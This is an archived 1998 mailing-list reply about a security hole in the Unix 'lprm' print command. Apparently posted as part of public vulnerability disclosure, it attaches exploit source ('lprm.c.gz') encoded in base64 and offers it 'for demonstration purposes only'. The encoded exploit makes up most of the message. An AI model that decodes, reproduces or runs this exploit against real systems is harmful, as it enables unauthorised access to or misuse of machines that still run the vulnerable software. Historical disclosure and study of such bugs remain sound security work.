Re: Nasty security hole in "lprm"

From: Seth McGann (smmat_private)
Date: Mon Apr 20 1998 - 11:29:07 PDT

  • Next message: Alan Cox: "Linux 2.0.34pre10: Summary of fixed vulnerabilities" 

    --=====================_893111347==_
Content-Type: text/plain; charset="us-ascii"

At 15:49 4/18/98 +0100, you wrote:
>Hi,
>
>Sorry to follow up on my own post about lprm, but...
>
>...yes OpenBSD fixed it long ago.
>
>I'll bet there are other lpr subsystem bugs they fixed too, that we should
>all care about :)

Here is an exploit, for demonstration purposes only...



--=====================_893111347==_
Content-Type: application/octet-stream; name="lprm.c.gz"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="lprm.c.gz"

H4sICENfOzUAA2xwcm0uYwB9VG1v2zYQ/q5fcVCRVrY1W35J5tS10a1NtwJpU6QZ9iE2Aoo6WUwk
UiMpW8aw/76j5JcURWtAsHgvzz338E6DLuSlLvocvK7Xhau6zJWwkCoNNkOIqzUkwnC1QY0JxDt4
l2lh4GrDpAEh4VrIqm4hKP09Gq5FaYWSr2FQGT2IhRw4LyQKXQJL8J+KWUJWlUwM8Az5k5BrSlYS
hCWLKgomE8iFRGB6XRUorenDu5wZIzg4KmmutiERVNU6g49EHbbMQCVZnCNYBQWFsjXCbzmWGdxI
fGVgjRI15eO+RZRNNuU2CU9I1WGr9FMf/qRmgbpkUKhEpIIz1xGotNHEqEpzhFKrjUhIFEIgIf4W
eb6DO6Y1sorKYc0xz4k6lKxE7brLG62MZfwJDFHMqO++S78jVJWmBokAwUCMQE3uIBNE0F2FUQUC
ARslQzqQmPKVdWEsZ7rApN+AEGMng0VjidZW2AxuMcmYhUl/1Id9hCugJHF1vbZRzJHQWCjr2hLS
Et8EU7qAxLU2QMsHjZ2zknBuscAiphgSjmdMktBORWriy+3Hz3dXt/tkYJwrnVCX+e7I0E1URixj
RAmpqNsSNyXK37++D2GnKuBMAk1Rg0gRkGpVuEMzYl+RCH/ifzAp4Y0pirfbUvQxqRZed+B5L4Tk
eZUguWwiVD9beC/2ZA7c/F++bEkTJIV9z/PoOixNhZDNvK2R1CuDDvzrATw8MFM8PAQ+jcEmhzPy
hGfIavA7M+8/zyuYkAGp4qaUh04KDd0uHTZtvnOJ8DGMqzRFHbY3PCNHruSaptWItVOYYJ2xST8a
Ked+El1erGYe+Y5mF0Rnk9FscZXg/WruL+vp5bLG4bIe08OjZX1OzzShf76sR5NlnZJ/OiYfvUfc
B0J49vPbhPNxC8TZso7pHMX0TiDTqFlik/kNlbaZ+eVl5Ei3Pc3HUeSOrucUAifHYtjZRzKrhDNt
7oerzozqPY8adfYIp6jRPsoVc7MfiHk0E29atJno9TotfaeQWM2jejKk+IFbQlpuXoObA4BHynoG
cUjf4/SM1bScwVHIzjPkA/RJ5cder70Iuqv5YUZ6hwv1jhlkh5cQ1R8+zA7G3nA1D5x9sYBp5zvv
6OQdXnzvHp/co8nJffRPvqkJR/v5T4te/Lzorz8s2nwE0sC/aTp/TY6zeimX0g8pvtMqVCPPA/+b
j78f+u3ffgfdRoSf/7q+bvfof0YLaciEBgAA
--=====================_893111347==_
Content-Type: text/plain; charset="us-ascii"


Seth M. McGann / smmat_private        "Security is making it
http://www.wpi.edu/~smm              to the bathroom in time."
KeyID: 1024/2048/177B6415
Fingerprint 5E87 5E5C 8FD9 1FFB 7836  C590 BA81 C796 177B 6415
--=====================_893111347==_--

    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:49:54 PDT